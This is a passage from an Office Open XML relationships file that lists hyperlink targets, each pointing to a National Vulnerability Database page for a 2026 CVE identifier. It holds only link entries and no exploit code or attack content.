Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86082" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86550" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86597" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86726" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86731" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12230" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33388" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70582" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72947" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76931" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53639" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81904" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81994" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81997" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84942" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18090" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19872" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63523" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69642" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76002" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77654" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78738" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78741" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78742" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85484" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85485" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85630" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56101" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78216" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78230" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16004" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69382" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72978" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75809" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16005" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69559" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75811" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16006" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18023" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69317" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69393" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75808" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75810" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28584" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28596" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28617" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28633" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54611" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68843" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68852" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68881" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68895" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69303" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69308" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69321" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69339" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69345" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69353" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69367" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69376" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69403" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69453" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69531" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69554" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69568" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69618" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69672" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69674" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69684" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69741" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69770" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69794" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72937" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72945" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72964" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77492" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78506" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78513" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79910" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80160" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80162" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81387" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81390" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81391" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81392" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81393" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81394" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81395" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81399" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81400" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81401" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81958" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81978" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81984" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81991" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81993" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 